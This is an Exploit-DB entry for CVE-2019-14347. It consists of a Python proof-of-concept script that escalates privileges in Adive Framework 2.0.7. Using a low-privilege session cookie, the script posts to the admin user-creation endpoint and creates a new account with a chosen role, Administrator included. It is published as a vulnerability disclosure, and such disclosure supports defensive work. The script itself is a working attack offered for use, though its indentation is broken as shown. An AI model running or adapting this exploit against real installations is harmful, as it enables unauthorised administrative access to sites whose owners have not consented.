Adive Framework 2.0.7 - Privilege Escalation

EDB-ID:

47600




Platform:

PHP

Date:

2019-11-08


# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
# Date: 2019-08-02
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows 10
# CVE : CVE-2019-14347

#Exploit

import requests
import sys

session = requests.Session()

http_proxy  = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"

proxyDict = {
             "http"  : http_proxy,
             "https" : https_proxy
           }
print('[*****************************************]')
print('[ BYPASSING Adive Framework Version.2.0.5 ]')
print('[*****************************************]''\n')



print('[+]Login with the correct credentials:' '\n')

user = input('[+]user:')
password = input('[+]password:')
print('\n')

url = 'http://localhost/adive/admin/login'
values = {'user': user,
          'password': password,
          }

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()['PHPSESSID']

print('Your session cookie is:'+ cookie +'\n')


host = sys.argv[1]
print('Create the new user:')
userName = input('[+]User:')
userUsername = input('[+]UserName:')
password = input('[+]Password:')
password2 = input('[+]Confirm Password:')
print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
permission = input('[+]permission:')

if (password == password2):
#configure proxy burp

#hacer el request para la creacion de usuario
data = {
'userName':userName,
'userUsername':userUsername,
'pass':password,
'cpass':password2,
'permission':permission,

}

headers= {
'Cookie': 'PHPSESSID='+cookie
}

request = session.post(host+'/adive/admin/user/add', data=data,
headers=headers, proxies=proxyDict)
print('+--------------------------------------------------+')

else:
print ('Passwords dont match!!!')

#PoC
https://imgur.com/dUgLYi6
https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif